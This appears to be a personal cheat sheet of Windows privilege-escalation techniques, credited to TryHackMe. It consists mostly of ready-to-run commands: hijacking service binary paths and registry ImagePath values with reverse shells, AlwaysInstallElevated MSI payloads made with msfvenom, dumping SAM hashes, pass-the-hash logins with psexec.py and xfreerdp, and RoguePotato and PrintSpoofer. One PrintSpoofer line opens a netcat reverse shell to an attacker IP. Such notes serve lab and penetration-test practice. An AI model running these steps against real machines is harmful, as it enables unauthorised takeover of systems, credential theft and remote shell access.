Windows

Credits - TryHackMe and many more [Will try my best to mention them :) ]...

- Registry HKLM is for all users, HKCU is for the current user. - Check security groups of current user

whoami /Groups
net user <username>

1. Insecure Service Permissions

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user <service=daclsvc>
sc qc <service=daclsvc>
# Elevated Privileges as ‘SERVICE_START_NAME : LocalSystem’
sc config <service=daclsvc> binpath="<path-to-reverse-shell>"
sc start <service=daclsvc>

2. Unquoted Service Path

sc qc unquotedsvc
accesschk.exe -d “C:\Program Files\Unquoted Path Service\”
copy reverse.exe “C:\Program Files\Unquoted Path Service\Common”
sc start unquotedsvc

3. Weak Registry Permissions NT AUTHORITY\INTERACTIVE = All logged-in users REG_EXPAND_SZ : An expandable data string. REG_SZ : This data type has a fixed length.

sc qc regsvc
accesschk.exe -k <registry-entry-for-service>
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add <registry-entry-for-service> /v ImagePath /t REG_EXPAND_SZ /d <path-to-rshell>

4. Insecure Service Executables

sc qc <service>
accesschk.exe <path-to-service.exe>
# output - RW Everyone
# Replace the service executable with reverse shell generated

5. Registry Autoruns [Todo]

6. Registry AlwaysInstallElevated set the AlwaysInstallElevated value to "1" (0x1) under both of the following registry keys: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

# Check the keys
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

# Payload generation
msfvenom -f msi
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
# [/i - install ]

7. Passwords in Registry

reg query HKLM /f password /s
# Adding autologon password
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /d testing123 /t REG_SZ

# DefaultUsername and DefaultPassword in autologin
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

# Query registry value [?]
Get-ChildItem -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\'

8. Retrieve password from SAM SYSTEM registry hives - SAM registry is not accessible reg query HKLM\SAM\SAM ERROR: Access is denied.

python3 creddump7/pwdump.py SYSTEM SAM
# Crack NTLM hash

9. If creds are saved from a previous user [run exe from a folder which belongs to the admin/higher privilege user]

# list saved creds
cmdkey /list

# run an executable with priv's on another user
runas /savecred /user:<> <path-to-exec>

10. Pass the Hash (pth)

# pth using impacket via SMB [pth-winexe works on SMB]
psexec.py admin@10.10.92.1 -hashes aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da

# xfreerdp with pth (pass-the-hash) [NT component only in LM:NT if no password for LM]
xfreerdp +clipboard /u:admin /pth:a9fdfa038c4b75ebc76dc855dd74f0da /cert:ignore /v:10.10.92.1

11. Task running every few intervals Append “path-to-exec” at the end of PowerShell script 12. Insecure GUI Apps file > open > navigation pane > C:\Windows\System32\cmd.exe 13. Startup Apps [createshortcut.vbs] Adding shortcut to reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" 14. RoguePotato Attack

• You need a compromised account on the victim machine with Impersonate privileges s0- whomai /priv [SeImpersonatePrivilege is Enabled] s1- sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:<IP of target>:9999 s2- nc -nlvp <port-used-in-reverse-exec> s3 - when running as “nt authority\local service” RoguePotato.exe -r <IP of attacker> -e "<path-to-exec>" -l 9999 - run as a local service "nt authority\local service" C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe" -or- C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 15. PrintSpoofer PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i - Tools winpeasany.exe seatbelt.exe all full sharp.exe audit JAWS [works in the presence of AV solutions]

- Powerup

Import-Module powerup.ps1
Invoke-AllChecks
Get-ServiceUnquoted

- List of Exploitable Privileges

GitHub - gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.GitHub

- SeImpersonate

# PrintSpoofer32.exe [requires an executable file. Hence, PowerShell scripts don't work]
.\PrintSpoofer32.exe -c 'nc.exe <IP> <port> -e cmd'

PreviousPrivilege Escalation Nextsocat

Last updated 2 years ago